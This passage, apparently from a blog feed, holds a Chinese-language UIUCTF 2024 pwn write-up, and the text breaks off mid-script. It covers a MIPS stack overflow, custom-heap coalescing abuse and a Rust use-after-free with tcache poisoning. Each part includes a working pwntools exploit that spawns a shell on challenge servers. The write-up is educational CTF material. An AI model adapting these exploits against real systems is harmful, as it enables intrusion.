(numbers[i] &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span></span><br><span class="line">    char4 = (numbers[i] &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xff</span></span><br><span class="line">    flag += <span class="built_in">bytes</span>([char1, char2, char3, char4])</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"><span class="comment"># TBTL{e4t_Y0ur_vegG13s_1n1714l1z3_y0ur_d4rn_v4r14bl35}</span></span><br></pre></td></tr></tbody></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>Fun!!! 感谢主办方，难度梯度做得很好。</p>
]]></content>
      <categories>
        <category>CTF</category>
      </categories>
      <tags>
        <tag>PWN</tag>
        <tag>Crypto</tag>
        <tag>Misc</tag>
        <tag>Reverse</tag>
      </tags>
  </entry>
  <entry>
    <title>UIUCTF 2024 PWN Writeup</title>
    <url>/posts/uiuctf-2024-wp/</url>
    <content><![CDATA[<p>我和 <a href="https://x.com/l3akctf">L3ak</a> 一起参加了今年的 <a href="https://2024.uiuc.tf/">UIUCTF</a>，最终我们排在第7。我只做了 Pwn 题，我们队最终也 AK 了 Pwn，<a href="https://x.com/minatotw_">MinatoTW</a> is goat🐐! </p>
<p>本文是比赛中所有 Pwn 题（除了一道 Pwn+Rev 以外）的 Writeup。</p>
<p><a href="https://gist.github.com/BeaCox/693563583377a778ba5b5fc98387b2d4">Engllish Writeup</a></p>
<h2 id="Backup-Power"><a href="#Backup-Power" class="headerlink" title="Backup Power"></a>Backup Power</h2><h3 id="概况"><a href="#概况" class="headerlink" title="概况"></a>概况</h3><blockquote>
<p>Can you turn on the backup generator for the SIGPwny Transit Authority?</p>
<p>75 solves</p>
</blockquote>
<p>这道题是 MinatoTW 解出来的，我只是在赛后复现并撰写 wp。</p>
<p><code>checksec</code> 结果：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">Arch:     mips-32-big</span><br><span class="line">RELRO:    Partial RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX unknown - GNU_STACK missing</span><br><span class="line">PIE:      No PIE (0x400000)</span><br><span class="line">Stack:    Executable</span><br><span class="line">RWX:      Has RWX segments</span><br></pre></td></tr></tbody></table></figure>

<p>这是一道 mips 架构的栈溢出题。我用<code>qemu-mips</code>去运行，用<code>gdb-multiarch</code>调试。</p>
<h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>程序的主要逻辑是：</p>
<ul>
<li><p>非<code>developer</code>（<code>developer</code>?<code>develper</code>?<code>devolper</code>? 一个程序出现三种拼写 XD）用户只被允许执行<code>shutdown</code>和<code>shutup</code>命令，没有可利用之处。</p>
</li>
<li><p>登录为<code>developer</code>用户，<code>command</code>会被设置为<code>todo</code>。调用<code>develper_power_management_portal()</code>函数后回到对命令进行判断的流程。其中，<code>develper_power_management_portal()</code>函数中调用<code>gets()</code>函数，存在栈溢出。</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">void</span> __cdecl <span class="title function_">develper_power_management_portal</span><span class="params">(<span class="type">int</span> cfi)</span></span><br><span class="line">{</span><br><span class="line">  <span class="type">char</span> buffer[<span class="number">4</span>]; <span class="comment">// [sp+18h] [+18h] BYREF</span></span><br><span class="line">  <span class="type">int</span> vars20; <span class="comment">// [sp+44h] [+44h]</span></span><br><span class="line"></span><br><span class="line">  gets(buffer);</span><br><span class="line">  <span class="keyword">if</span> ( vars20 != cfi )</span><br><span class="line">    _stack_chk_fail_local();</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
</li>
<li><p>如果<code>command</code>为<code>system</code>，则程序会拼接栈上变量作为<code>system()</code>函数的参数并执行：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(command, system_str) )</span><br><span class="line">{</span><br><span class="line">  <span class="built_in">sprintf</span>(command_buf, <span class="string">"%s %s %s %s"</span>, arg1, arg2, arg3, arg4);</span><br><span class="line">  system(command_buf);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
</li>
<li><p>在调用<code>develper_power_management_portal()</code>函数前后，程序试图通过寄存器来备份栈上变量的值：</p>
<p><img src="https://bu.dusays.com/2024/07/06/6689647325ffb.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/06/6689647325ffb.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="backup"></p>
<p>但是在<code>develper_power_management_portal()</code>函数中，程序又在调用<code>gets()</code>函数之后将寄存器的值设置为栈上的值：</p>
<p><img src="https://bu.dusays.com/2024/07/06/6689648a4c273.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/06/6689648a4c273.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="ruin"></p>
<p>因此没有起到备份的效果，我们仍然可以通过栈溢出到<code>0x24+var_sC($sp), 0x24+var_s10($sp), ...</code>来设置<code>s4, s5, s6, s7</code>从而设置<code>arg1, arg2, arg3, arg4</code>。</p>
</li>
</ul>
<p>至此，我们的解题路线可以归纳为：利用栈溢出设置<code>command</code>为<code>system</code>，并设置<code>arg1</code>为<code>sh;\x00</code>，使得程序执行<code>system("sh")</code>。值得注意的是程序开启了<code>cfi</code>校验，即在<code>develper_power_management_portal()</code>函数返回时，会检查其返回地址有没有被修改。在这题中我们不需要劫持控制流，因此将返回地址保持原状即可。</p>
<h3 id="调试"><a href="#调试" class="headerlink" title="调试"></a>调试</h3><p>使用 <code>qemu-mips</code>启动程序并等待<code>gdb</code>远程调试：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">qemu-mips -g 1234 ./backup-power</span><br></pre></td></tr></tbody></table></figure>

<p>在另一个终端中启动<code>gdb-multiarch</code>并远程调试：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">gdb-multiarch ./backup-power</span><br><span class="line"></span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> <span class="built_in">arch</span> mips</span><br><span class="line">pwndbg&gt; <span class="built_in">set</span> endian big</span><br><span class="line">pwndbg&gt; target remote :1234</span><br></pre></td></tr></tbody></table></figure>

<p>可以通过 gdb 调试来定位我们需要修改的变量在栈上的位置：</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">pwndbg&gt; b *0x400ee8</span><br><span class="line">pwndbg&gt; c</span><br></pre></td></tr></tbody></table></figure>

<p>输入用户名<code>devolper</code>，再输入<code>aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaa</code>让<code>gets()</code>接收，就可以看到：</p>
<p><img src="https://bu.dusays.com/2024/07/03/66856156f10e3.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/03/66856156f10e3.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="args"></p>
<p><img src="https://bu.dusays.com/2024/07/03/6685632ac71c6.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/03/6685632ac71c6.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="stack"></p>
<p>将<code>command</code>覆盖为<code>system</code>，<code>arg1</code>覆盖为<code>sh;\x00</code>，栈上包含程序地址处尽量保持原样即可。</p>
<p>值得注意的两个地方：</p>
<ol>
<li>返回地址：上图中第二个<code>0x400b0c</code>。由于开启<code>cfi</code>，返回地址必须保持原样。</li>
<li><code>gp</code>寄存器：上图中<code>0x4aa30</code>会被存入<code>gp</code>寄存器，之后会用于计算函数偏移量，因此不能修改。</li>
</ol>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">exe = ELF(<span class="string">"./backup-power"</span>)</span><br><span class="line"></span><br><span class="line">context.binary = exe</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">conn</span>():</span><br><span class="line">    <span class="keyword">if</span> args.LOCAL:</span><br><span class="line">        r = process([exe.path])</span><br><span class="line">        <span class="keyword">if</span> args.DEBUG:</span><br><span class="line">            gdb.attach(r)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r = remote(<span class="string">"backup-power.chal.uiuc.tf"</span>, <span class="number">1337</span>, ssl=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> r</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    r = conn()</span><br><span class="line"></span><br><span class="line">    r.sendlineafter(<span class="string">b"Username: "</span>, <span class="string">b'devolper'</span>)</span><br><span class="line">    payload = <span class="string">b"A"</span> * <span class="number">24</span> + <span class="string">b"sh;\x00"</span>.ljust(<span class="number">12</span>, <span class="string">b"A"</span>) + p32(<span class="number">0xdeadbeef</span>) * <span class="number">2</span> + p32(<span class="number">0x400b0c</span>)</span><br><span class="line"></span><br><span class="line">    sp = (</span><br><span class="line">        p32(<span class="number">0</span>)*<span class="number">6</span></span><br><span class="line">        + p32(<span class="number">0x004AA330</span>)                       <span class="comment"># that's gp, we need to keep it</span></span><br><span class="line">        + p32(<span class="number">0</span>)*<span class="number">5</span></span><br><span class="line">        + <span class="string">b"devolper"</span>.ljust(<span class="number">100</span>, <span class="string">b"\x00"</span>)</span><br><span class="line">        + <span class="string">b"devolper"</span>.ljust(<span class="number">100</span>, <span class="string">b"\x00"</span>)</span><br><span class="line">        + <span class="string">b"system\x00"</span>                         <span class="comment"># overwrite command to system</span></span><br><span class="line">    )</span><br><span class="line"></span><br><span class="line">    payload += sp</span><br><span class="line">    r.sendline(payload)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>


<h2 id="pwnymalloc"><a href="#pwnymalloc" class="headerlink" title="pwnymalloc"></a>pwnymalloc</h2><h3 id="概况-1"><a href="#概况-1" class="headerlink" title="概况"></a>概况</h3><blockquote>
<p>i’m tired of hearing all your complaints. pwnymalloc never complains.</p>
<p>65 Solves</p>
</blockquote>
<p>这道题是赛中和队友共同解出来的。</p>
<h3 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h3><p>这是一道堆题，但是堆管理器是自定义的。</p>
<p>程序的基本功能为：</p>
<ol>
<li>提交申诉（申请可用大小为0x48的堆块，输入内容，堆块内容被清零，堆块被释放）</li>
<li>查看申诉（摆设，没有实际实现）</li>
<li>申请退款（申请可用大小为0x88的堆块，用于存放<code>refund_request</code>结构体，不能被直接<code>free</code></li>
<li>查询退款状态（状态为<code>REFUND_APPROVED</code>时会打印 flag ）</li>
</ol>
<p><code>refund_request</code>结构体的定义如下：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">refund_request</span> {</span></span><br><span class="line">    <span class="type">refund_status_t</span> status;</span><br><span class="line">    <span class="type">int</span> amount;</span><br><span class="line">    <span class="type">char</span> reason[<span class="number">0x80</span>];</span><br><span class="line">} <span class="type">refund_request_t</span>;</span><br></pre></td></tr></tbody></table></figure>

<p>申请退款函数会将<code>status</code>设置为0即<code>REFUND_DENIED</code>，另一个状态是1即<code>REFUND_APPROVED</code>，<code>amount</code>和<code>reason</code>都由用户输入。没有任何常规功能能直接将结构体的<code>status</code>设置为<code>REFUND_APPROVED</code>，因此需要考虑利用自定义的堆管理器来完成对该字段的修改。</p>
<p>由于堆块需要0x10字节对齐，因此堆块的结构可能存在下面两种情况：</p>
<p><img src="https://bu.dusays.com/2024/07/04/6686a5e8e217a.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/04/6686a5e8e217a.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="chunk"></p>
<p>当堆块可用大小为0x…8字节时，用户可用写到<code>btag</code>所在的8字节。正常情况下只有被<code>free</code>的堆块才会设置<code>btag</code>，这也是问题所在: 题目中的堆块可用大小都是0x…8字节，而在这种情况下，用户可以控制<code>btag</code>的值。</p>
<p>堆管理器中空闲块合并的代码对我来说比较有趣（根据<code>unsorted bin</code>的经验）。简单来说，在<code>free</code>一个堆块或者拆分一个大的堆块时，会调用<code>coalesce()</code>合并空闲块；该函数会检查前一个和后一个堆块的大小、状态来决定是否合并。</p>
<p>以合并前向块为例，有如下调用链</p>
<p><code>coalesce()-&gt;prev_chunk()-&gt;get_prev_size()</code>，<code>get_prev_size()</code>函数实现如下：</p>
<figure class="highlight c"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">size_t</span> <span class="title function_">get_prev_size</span><span class="params">(chunk_ptr block)</span> {</span><br><span class="line">    <span class="type">btag_t</span> *prev_footer = (<span class="type">btag_t</span> *) ((<span class="type">char</span> *) block - BTAG_SIZE);</span><br><span class="line">    <span class="keyword">return</span> prev_footer-&gt;size;</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>其中<code>btag</code>如前文所示位于每个堆块的最后8字节，堆管理器通过该值判断前向空闲堆块的大小。如果前向堆块未被<code>free</code>，正常情况下<code>get_prev_size</code>应当返回0。但如果我们将<code>btag</code>值设置为某一个正数，堆管理器会根据这个值去定位前向堆块的<code>size | status</code>，进一步判断其是否被<code>free</code>。通过构造 payload，我们完全可以修改某个堆块的<code>btag</code>，并在目标<code>size | status</code>处填充恰当的值，诱导堆管理器对前向的某一片连续的内存空间进行合并，不论这片内存空间处于什么样的使用状态。</p>
<h3 id="攻击思路"><a href="#攻击思路" class="headerlink" title="攻击思路"></a>攻击思路</h3><p>梳理一下我们的攻击思路：</p>
<ol>
<li><p>通过申请退款功能申请2个堆块（大小都为0x90）</p>
</li>
<li><p>将第二个堆块作为目标（其退款状态会被改写）</p>
</li>
<li><p>在第二个堆块的最后8字节写一个比0x90大的<code>size</code>作为<code>btag</code>（如0xb0）</p>
</li>
<li><p>在第一个堆块中间相应的位置（<code>chunk2_addr + 0x90 - 0xb0</code>）写上对应的<code>size | status</code>（如<code>0xb0 | 0</code>，表示被free）<br>此时堆块状态：</p>
<p><img src="https://bu.dusays.com/2024/07/04/6686af09c9dc0.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/04/6686af09c9dc0.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="1"></p>
</li>
<li><p>提交申诉，触发空闲块合并，会合并出一个大小为<code>0xb0+0x50</code>的空闲堆块，起始地址为<code>chunk2_addr + 0x90 - 0xb0</code></p>
<p><img src="https://bu.dusays.com/2024/07/04/6686b251a012a.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/04/6686b251a012a.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="2"></p>
</li>
<li><p>再调用申请退款函数，此时申请到的堆块起始地址为<code>chunk2_addr + 0x90 - 0xb0</code>，大小为0x90</p>
</li>
<li><p>这个堆块横跨第一个堆块和第二个堆块，填充合适的<code>payload</code>可以将第二个堆块中的<code>refund_request-&gt;status</code>写为1即<code>REFUND_APPROVED</code></p>
<p><img src="https://bu.dusays.com/2024/07/04/6686b34c90134.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/04/6686b34c90134.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="3"></p>
</li>
<li><p>调用检查退款状态函数，获得 flag</p>
</li>
</ol>
<h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h3><p>我们伪造了一个大小为0xb0的空闲堆块，要注意在合并空闲块时会调用<code>free_list_remove(prev_block)</code>，因此要让该假堆块的<code>next</code>和<code>prev</code>指针为0（或合法地址），否则会出现内存访问的错误。</p>
<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">exe = ELF(<span class="string">"./chal"</span>)</span><br><span class="line"></span><br><span class="line">context.binary = exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">conn</span>():</span><br><span class="line">    <span class="keyword">global</span> r</span><br><span class="line">    <span class="keyword">if</span> args.LOCAL:</span><br><span class="line">        r = process([exe.path])</span><br><span class="line">        <span class="keyword">if</span> args.DEBUG:</span><br><span class="line">            gdb.attach(r)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r = remote(<span class="string">"pwnymalloc.chal.uiuc.tf"</span>, <span class="number">1337</span>, ssl=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">complain</span>(<span class="params">data</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendafter(<span class="string">b":"</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">refund</span>(<span class="params">data</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"3"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"refunded:\n"</span>, <span class="string">b"0"</span>) <span class="comment"># why would i refund XD</span></span><br><span class="line">    r.sendafter(<span class="string">b"request:\n"</span>, data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">win</span>(<span class="params">index</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"4"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"ID:\n"</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    conn()</span><br><span class="line"></span><br><span class="line">    <span class="comment"># fake chunk inside</span></span><br><span class="line">    payload = <span class="string">b'\x00'</span>*<span class="number">0x60</span> + p64(<span class="number">0xb0</span>) +p64(<span class="number">0</span>)+p64(<span class="number">0</span>) + <span class="string">b'\n'</span></span><br><span class="line">    refund(payload)</span><br><span class="line">    <span class="comment"># the target chunk we will overflow</span></span><br><span class="line">    payload = <span class="string">b'\x00'</span>*<span class="number">0x78</span> + p64(<span class="number">0xb0</span>)[:-<span class="number">1</span>]</span><br><span class="line">    refund(payload)</span><br><span class="line">    <span class="comment"># trigger the coalesce</span></span><br><span class="line">    payload = <span class="string">b'BeaCox never complains\n'</span></span><br><span class="line">    complain(payload)</span><br><span class="line">    <span class="comment"># overwrite the target to make it approved</span></span><br><span class="line">    payload = p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0x91</span>)+p32(<span class="number">1</span>)+p32(<span class="number">0xdeadbeef</span>) + <span class="string">b'\n'</span> <span class="comment"># what about refunding a deadbeef?</span></span><br><span class="line">    refund(payload)</span><br><span class="line">    gdb.attach(r)</span><br><span class="line">    <span class="comment"># win!</span></span><br><span class="line">    win(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    r.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></tbody></table></figure>

<h2 id="Rusty-Pointers"><a href="#Rusty-Pointers" class="headerlink" title="Rusty Pointers"></a>Rusty Pointers</h2><h3 id="概况-2"><a href="#概况-2" class="headerlink" title="概况"></a>概况</h3><blockquote>
<p>The government banned C and C++ in federal software, so we had to rewrite our train schedule management program in Rust. Thanks Joe Biden. Because of government compliance, the program is completely memory safe.</p>
<p>36 Solves</p>
</blockquote>
<p>这道题是赛中和队友共同解出来的。</p>
<h3 id="题目分析-2"><a href="#题目分析-2" class="headerlink" title="题目分析"></a>题目分析</h3><p>我从来没有写过一行 Rust 代码，但是对其内存安全特性却是早有耳闻，但……真是这样吗？</p>
<p>程序主要功能如下：</p>
<ol>
<li>Create a Rule or Note</li>
<li>Delete a Rule or Note</li>
<li>Read a Rule or Note</li>
<li>Edit a Rule or Note</li>
<li>Make a Law</li>
<li>Exit</li>
</ol>
<p>观察源代码可以看到：</p>
<figure class="highlight rust"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">const</span> LEN: <span class="type">usize</span> = <span class="number">64</span>;</span><br><span class="line"><span class="keyword">const</span> LEN2: <span class="type">usize</span> = <span class="number">2000</span>;</span><br><span class="line"><span class="keyword">const</span> LEN3: <span class="type">usize</span> = <span class="number">80</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#[inline(never)]</span></span><br><span class="line"><span class="keyword">fn</span> <span class="title function_">get_rule</span>() <span class="punctuation">-&gt;</span> &amp;<span class="symbol">'static</span> <span class="keyword">mut</span> [<span class="type">u8</span>; LEN] {</span><br><span class="line">	<span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">buffer</span> = Box::<span class="title function_ invoke__">new</span>([<span class="number">0</span>; LEN]);</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">get_ptr</span>(&amp;<span class="keyword">mut</span> buffer);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">#[inline(never)]</span></span><br><span class="line"><span class="keyword">fn</span> <span class="title function_">get_law</span>() <span class="punctuation">-&gt;</span> &amp;<span class="symbol">'static</span> <span class="keyword">mut</span> [<span class="type">u8</span>; LEN2] {</span><br><span class="line">	<span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">buffer</span> = Box::<span class="title function_ invoke__">new</span>([<span class="number">0</span>; LEN2]);</span><br><span class="line">	<span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">_buffer2</span> = Box::<span class="title function_ invoke__">new</span>([<span class="number">0</span>; <span class="number">16</span>]);</span><br><span class="line">	<span class="keyword">return</span> <span class="title function_ invoke__">get_ptr</span>(&amp;<span class="keyword">mut</span> buffer);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">#[inline(never)]</span></span><br><span class="line"><span class="keyword">fn</span> <span class="title function_">get_note</span>() <span class="punctuation">-&gt;</span> <span class="type">Box</span>&lt;[<span class="type">u8</span>; LEN]&gt;{</span><br><span class="line">	<span class="keyword">return</span> Box::<span class="title function_ invoke__">new</span>([<span class="number">0</span>; LEN])</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>只有<code>get_note()</code>函数没有调用<code>get_ptr</code>，那么必有蹊跷，观察<code>get_ptr</code>函数：</p>
<figure class="highlight rust"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">const</span> S: &amp;&amp;() = &amp;&amp;();</span><br><span class="line"><span class="meta">#[inline(never)]</span></span><br><span class="line"><span class="keyword">fn</span> <span class="title function_">get_ptr</span>&lt;<span class="symbol">'a</span>, <span class="symbol">'b</span>, T: ?<span class="built_in">Sized</span>&gt;(x: &amp;<span class="symbol">'a</span> <span class="keyword">mut</span> T) <span class="punctuation">-&gt;</span> &amp;<span class="symbol">'b</span> <span class="keyword">mut</span> T {</span><br><span class="line">	<span class="keyword">fn</span> <span class="title function_">ident</span>&lt;<span class="symbol">'a</span>, <span class="symbol">'b</span>, T: ?<span class="built_in">Sized</span>&gt;(</span><br><span class="line">        _val_a: &amp;<span class="symbol">'a</span> &amp;<span class="symbol">'b</span> (),</span><br><span class="line">        val_b: &amp;<span class="symbol">'b</span> <span class="keyword">mut</span> T,</span><br><span class="line">	) <span class="punctuation">-&gt;</span> &amp;<span class="symbol">'a</span> <span class="keyword">mut</span> T {</span><br><span class="line">			val_b</span><br><span class="line">	}</span><br><span class="line">	<span class="keyword">let</span> <span class="variable">f</span>: <span class="title function_ invoke__">fn</span>(_, &amp;<span class="symbol">'a</span> <span class="keyword">mut</span> T) <span class="punctuation">-&gt;</span> &amp;<span class="symbol">'b</span> <span class="keyword">mut</span> T = ident;</span><br><span class="line">	<span class="title function_ invoke__">f</span>(S, x)</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>看上去非常难懂，但是 chatGPT 告诉我该函数的作用是延长变量的生命周期。可以在 gdb 中观察<code>get_rule</code>和<code>get_note</code>的区别：</p>
<ol>
<li><p>Create a Note 然后 Edit a Note 写入<code>aaaa</code></p>
</li>
<li><p>Create a Rule 然后 Edit a Rule 写入<code>bbbb</code></p>
</li>
<li><p>查看堆</p>
<p><img src="https://bu.dusays.com/2024/07/06/66894a755d05c.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/06/66894a755d05c.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="differnce"></p>
</li>
</ol>
<p>显然，二者都会申请大小为0x50的堆块，但是<code>get_ptr()</code>函数会将这个堆块<code>free</code>掉，并允许我们继续使用这个堆块，也就是 UAF（Use After Free）。</p>
<p>上文提到，<code>get_law()</code>也调用了<code>get_ptr()</code>，不同的是它的大小比较大：</p>
<figure class="highlight rust"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">const</span> LEN2: <span class="type">usize</span> = <span class="number">2000</span>;</span><br><span class="line"><span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">buffer</span> = Box::<span class="title function_ invoke__">new</span>([<span class="number">0</span>; LEN2]);</span><br><span class="line"><span class="keyword">return</span> <span class="title function_ invoke__">get_ptr</span>(&amp;<span class="keyword">mut</span> buffer);</span><br></pre></td></tr></tbody></table></figure>

<p>因此将其<code>free</code>后会进入 unsorted bin，其<code>fd</code>和<code>bk</code>指针将会指向<code>libc</code>中的<code>main_arena</code>，造成<code>libc leak</code>：</p>
<p><img src="https://bu.dusays.com/2024/07/06/66894d77b3676.png" class="lazyload" data-srcset="https://bu.dusays.com/2024/07/06/66894d77b3676.png" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="libc leak"></p>
<h3 id="攻击思路-1"><a href="#攻击思路-1" class="headerlink" title="攻击思路"></a>攻击思路</h3><p>接下来我们就需要考虑如何利用手上的 UAF 了。</p>
<p><code>libc</code>的版本为2.31，<code>malloc_hook</code>和<code>free_hook</code>可以利用，且<code>tcache</code>没有<code>safe link</code>机制。</p>
<p>由于拥有 Write After Free 和 Read After Free，我们可以用<a href="https://github.com/shellphish/how2heap/blob/master/glibc_2.31/tcache_poisoning.c">Tcache Poisoning</a>方法得到 Arbitrary Write 和 Arbitrary Read。</p>
<p>我们可以利用 Arbitrary Write 将<code>free_hook</code>写为<code>system</code>函数地址，然后在一个堆块（note）开头填入<code>/bin/sh\x00</code>并将其<code>free</code>，这样就会触发<code>system('/bin/sh')</code>。</p>
<h3 id="exp-2"><a href="#exp-2" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">exe = ELF(<span class="string">"./rusty_ptrs"</span>)</span><br><span class="line">libc = ELF(<span class="string">"libc-2.31.so"</span>)</span><br><span class="line">ld = ELF(<span class="string">"ld-2.31.so"</span>)</span><br><span class="line"></span><br><span class="line">context.binary = exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">conn</span>():</span><br><span class="line">    <span class="keyword">global</span> r</span><br><span class="line">    <span class="keyword">if</span> args.LOCAL:</span><br><span class="line">        r = process([exe.path])</span><br><span class="line">        <span class="keyword">if</span> args.DEBUG:</span><br><span class="line">            gdb.attach(r)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        r = remote(<span class="string">"rustyptrs.chal.uiuc.tf"</span>, <span class="number">1337</span>, ssl=<span class="literal">True</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_rule</span>():</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">create_note</span>():</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete_rule</span>(<span class="params">index</span>):</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"2"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="string">b"1"</span>)</span><br><span class="line">    r.sendlineafter(<span class="string">b"&gt; "</span>, <span class="built_in">str</span>(index).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title 